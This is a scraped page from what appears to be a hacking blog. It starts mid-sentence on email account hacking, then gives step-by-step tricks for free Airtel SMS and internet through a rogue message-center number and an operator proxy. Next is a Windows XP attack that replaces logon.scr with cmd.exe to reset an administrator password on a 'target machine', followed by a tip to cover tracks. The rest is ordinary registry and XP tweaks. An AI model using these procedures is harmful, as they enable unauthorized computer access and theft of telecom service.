and then the CATCHA code,reply on the secret question,but beware because you have like 3 tries only.

Read more: http://www.go-hacking.co.cc/search/label/Email%20Hacking#ixzz0y5m2HfHO
Under Creative Commons License: Attribution
Learn hacking HERE

Hack Airtel for free Unlimited SMS

Many people search for free Airtel message center number to start sending unlimited messages without paying for them. Well, previously many websites made posts on these free message center numbers, but after the frequent use of the number, Airtel capped or filtered those numbers from further use. But still there are few working message center numbers and here I am going to reveal that with you. Note that Airtel might ban this number anytime, so be fast in using this and send free sms to anyone from your Airtel mobile number.
airtel-free-sms-300x112
How to send unlimited free SMS using free SMS center no hack

1. Navigate to Messages option on your mobile and click on Settings
2. Click on Message Center Number and proceed to add a new message center number.
3. In Message Center Name field, write anything. For an example, “crack to hack”.
4. In the Message Center Number field, write +919810051905
5. Choose Preferred Connection Type as Packet Data
6. Save the message center and activate it from the options.


Now we have configured the message settings to send and receive all message through an another message center number. But since we have selected Packet data as connection type, we have to do some additional settings on our phone.

1. Go to your phone menu and navigate to Settings >> Phone Settings >> Connection >> Packet Data
2. In the settings of packet Data, edit the following options
3. Packet Data Connection >> When available and Access Point >> Airtel Live
4. Save all settings and you are done.

Note: Here we are using a CDMA message center number to send free messages from Airtel mobile. Since CDMA networks don’t support 91 as the country code, you have to add 0 before every number. This is very important and if you make mistake here, this trick will not work.
Example : Suppose you want to send free messages to 9861098610, now while composing the SMS, type this number as 09861098610 in stead of 919861098610 or +919861098610.
And also, message center number settings option may vary from phone to phone. The above steps are mentioned for Nokia mobile phones. If you want to try sending free SMS from any other handset, use your mobile manual and set the new message center number accordingly.

Airtel Free MO

YES free MO means you can access internet in your mobile for free airtel charging 30p/50kb if you access the internet in mobile or PC now just follow the instructions bellow for free internet

* your mobile should Gprs enabled handset

* insert you Airtel prepaid sim

* dial *567# to activate MO select 1 to activate

* install the settings in you hand set then download the below application OPera MINI

* in Tools->settings->connections->select MO and open Advance Settings or find proxy settings

eneter the ip address as 100.1.200.99 port 8080 once its saved swithch OFF and swithch ON

you handset.

* Goto opera MINI and start accesing the internet for free

FOR PC

Now Create a Dialup Connection manually with the followind details

Open Control Panel -> Network Connectons -> New Connection Wizard
Click Next
Choose "Connect to the Internet"
Click Next
Choose "Setup my connection manually"
Click Next
Choose "Connect using a dial-up modem"
Click Next
Enter ISP Name as you want
Click Next
Enter Phone Number as *99***2#
Click Next

Click Next
Add shortcut to desktop
Click Finish

Now it will ask for User Name and Password, just click Cancel.

Now Open Control Panel -> phone and Modem Options
Under Modems Tab select the Modem you have installed and click Properties
Select Advanced Tab. Copy and Paste the following code into Extra Initialization Commands and click Ok

~~~~~~~~~~~~~~~~~

Code: AT+CGDCONT=2, "IP","airtelfun.com","",0,0

~~~~~~~~~~~~~~~~~

settangs for Firefox

Software Required:-

1] Mozilla Firefox 1.5 or 2.0
[download it from getfirefox.com ]

2] User Agent Switcher
(download it from mozilla)
[before downloading User Agent Switcher, read this post fully]

3] Device [Data cable/Infrared/Bluetooth] Software
[this you will get normally in CD while purchasing]

Install Mozilla Firefox 1.5 and run the application atleast once.
4] Now download User Agent Switcher from the address mentioned above.
[Note: User Agent Switcher shold be downloaded from Installed Firefox]

5] After installing User Agent Switcher, Exit Firefox and Restart it.
6] Now Click Tools -> User Agent Switcher -> Optons -> Options
Select User Agents from left panel and Click Add Button and Enter the following details and Click Ok and Ok

Description : iFirefox/2.0
User Agent : IMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061010

~~~~~~~~~~~~~~~~~

7] Now Select iFirefox/2.0 as User Agent from Tools-> User Agent Switcher.
8] Now Configure Firefox to Proxy Server as mentioned below

Click Tools ->Options in Firefox
Select General Tab
Click Connection Settings button and make Manual Proxy Configuration
Enter All Proxy's as 100.1.200.99 and
Ports as 8080
Click Ok and Ok

Now Open Internet Explorer Properties -> Connections Tab
Select the connection you have created and Click Settings button.
Now Enable Proxy Server and enter the address as 100.1.200.99 and
Port as 8080 and Click Ok and Ok

Thats all you have done it.
Now use the dial-up connections shortcut from desktop and click Dial. Open Firefox and enter any Web Address you want.




Note: check the balance before you access, it will remain same after you access internet also.

How to hack windows XP admin password

If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:

cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos

Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.

Once this happens if you enter this command minus the quotes

"net user password"

If the Administrator Account is called Frank and you want the password blah enter this

"net user Frank blah"

and this changes the password on franks machine to blah and your in.


Have fun

p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks



Registry Hacking

Display legal notice on startup:
Wanna tell your friends about the do's and dont's in your computer when they login in your absence. Well you can do it pretty easily by displaying a legal notice at system start up.
REGEDIT
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\policies\system]"legalnoticecaption"="enter your notice caption"
"legalnoticetext"="enter your legal notice text"

Automatic Administrator Login:
Well here's the trick which you can use to prove that Windows XP is not at all secure as multi-user operating system. Hacking the system registry from any account having access to system registry puts you in to the administrator account.
REGEDIT 4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"AutoAdminLogon"="1"

No Shutdown:
Wanna play with your friends by removing the shutdown option from start menu in their computer.
Just hack it down !!!
Regedit
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Explorer
"NoClose"="DWORD:1"

Menu Delays:

Another minor and easy tweak to remove any delay from menus sliding out. For this you will need to use regedit (open regedit by going to Start -> Run..., then typing 'regedit' and pressing enter). The key you need to change is located in HKEY_CURRENT_USERControl PanelDesktop. The actual key is called MenuShowDelay - all you have to do is change the value to 0. Remember, you will have to re-boot your computer for this tweak to take effect.

GPEDIT.MSC And Autoplay

A great tweaking file that comes with XP is gpedit.msc. Go to Start -> Run... and then type in 'gpedit.msc' and press enter. This is effectively the Policies Editor, and it comes in handy often. For example, if you hate CD autoplay like I do and want to permanently disable it, you can use this tool to do so. Just run gpedit.msc, then go to Computer Configuration -> Administrative Templates -> System. In here you can see the value 'Turn Off Autoplay'. Right-click on it and then click 'Properties'.

Increasing options in add/remove programs:

Not a fan of MSN Messenger? don't want Windows Media Player on your system? Fair enough, but if you go to Add/Remove Programs in the Control Panel, by default none of Windows XP's 'built in' programs are visible. it's fairly easy to change, though... just open the file X:\Windows\inf\sysoc.inf (where X: is the drive letter where Windows XP is installed) in Notepad. You should see a section of the file something like this:

[Components]
NtComponents=ntoc.dll,NtOcSetupProc,,4
WBEM=ocgen.dll,OcEntry,wbemoc.inf,hide,7
Display=desk.cpl,DisplayOcSetupProc,,7
Fax=fxsocm.dll,FaxOcmSetupProc,fxsocm.inf,,7
NetOC=netoc.dll,NetOcSetupProc,netoc.inf,,7
iis=iis.dll,OcEntry,iis.inf,,7
com=comsetup.dll,OcEntry,comnt5.inf,hide,7
dtc=msdtcstp.dll,OcEntry,dtcnt5.inf,hide,7
IndexSrv_System = setupqry.dll,IndexSrv,setupqry.inf,,7
TerminalServer=TsOc.dll, HydraOc, TsOc.inf,hide,2
msmq=msmqocm.dll,MsmqOcm,msmqocm.inf,,6
ims=imsinsnt.dll,OcEntry,ims.inf,,7
fp_extensions=fp40ext.dll,FrontPage4Extensions,fp4 0ext.inf,,7
AutoUpdate=ocgen.dll,OcEntry,au.inf,hide,7
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7
RootAutoUpdate=ocgen.dll,OcEntry,rootau.inf,,7
IEAccess=ocgen.dll,OcEntry,ieaccess.inf,,7

This is a list of all components installed at the moment. I've taken the example of MSN Messenger - the program entry called 'msmsgs', third-last line. You can see the word 'hide' highlighted - this is the string which tells Windows not to display the component in the Add/Remove Programs list. Fix this up by simply deleting the word 'hide' like so:

msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7

To this:

msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,,7

Now, after restarting, you should be able to see MSN Messenger in the Add/Remove Programs list. If you want to be able to quickly view and remove all components, simply open the sysoc.inf file and do a global find and replace for the word ",hide" and replace it with a single comma ",".

Automatically Kill Programs At Shutdown:

don't you hate it when, while trying to shut down, you get message boxes telling you that a program is still running? Making it so that Windows automatically kills applications running is a snap. Simply navigate to the HKEY_CURRENT_USERControl PanelDesktop directory in the Registry, then alter the key AutoEndTasks to the value 1.

Speeding Up Share Viewing:

This is a great tweak. Before I found it, I was always smashing my head against the table waiting to view shares on other computers. Basically, when you connect to another computer with Windows XP, it checks for any Scheduled tasks on that computer - a fairly useless task, but one that can add up to 30 seconds of waiting on the other end - not good! Fortunately, it's fairly easy to disable this process. First, navigate to HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/Current Version/Explorer/RemoteComputer/NameSpace in the Registry. Below that, there should be a key called {D6277990-4C6A-11CF-8D87-00AA0060F5BF}. Just delete this, and after a restart, Windows will no longer check for scheduled tasks - mucho performance improvement!

Create a Shortcut to Lock Your Computer

Leaving your computer in a hurry but you don’t want to log off? You can double-click a shortcut on your desktop to quickly lock the keyboard and display without using CTRL+ALT+DEL or a screen saver. To create a shortcut on your desktop to lock your computer: Right-click the desktop. Point to New, and then click Shortcut. The Create Shortcut Wizard opens. In the text box, type the following: rundll32.exe user32.dll,LockWorkStation Click Next. Enter a name for the shortcut. You can call it "Lock Workstation" or choose any name you like. Click Finish. You can also change the shortcut's icon (my personal favorite is the padlock icon in shell32.dll). To change the icon: Right click the shortcut and then select Properties. Click the Shortcut tab, and then click the Change Icon button. In the Look for icons in this file text box, type: Shell32.dll. Click OK. Select one of the icons from the list and then click OK You could also give it a shortcut keystroke such CTRL+ALT+L. This would save you only one keystroke from the normal command, but it could be more convenient.

Speed up Internet Explorer 6 Favorites
For some reason, the Favorites menu in IE 6 seems to slow down dramatically sometimes--I've noticed this happens when you install Tweak UI 1.33, for example, and when you use the preview tip to speed up the Start menu. But here's a fix for the problem that does work, though it's unclear why: Just open a command line window (Start button -> Run -> cmd) and type sfc, then hit ENTER. This command line runs the System File Checker, which performs a number of services, all of which are completely unrelated to IE 6. But there you go: It works.

Aspi

WinXP does not come with an Aspi layer. So far almost 90% of the problems with WinXP and CD burning software are Aspi layer problems. After installing WinXP, before installing any CD burning software do a few things first: 1. Open up "My computer" and right click on the CD Recorder. If your CD recorder was detected as a CD recorder there will be a tab called "Recording". On this tab uncheck ALL of the boxes. apply or OK out of it and close my computer. 2. Next install the standard Aspi layer for NT. Reboot when asked. That's is. after the reboot you can install any of the currently working CD recording applications with no problems. If using CD Creator do not install direct CD or Take two as they are currently incompatible but Roxio has promised a fix as soon as XP is released.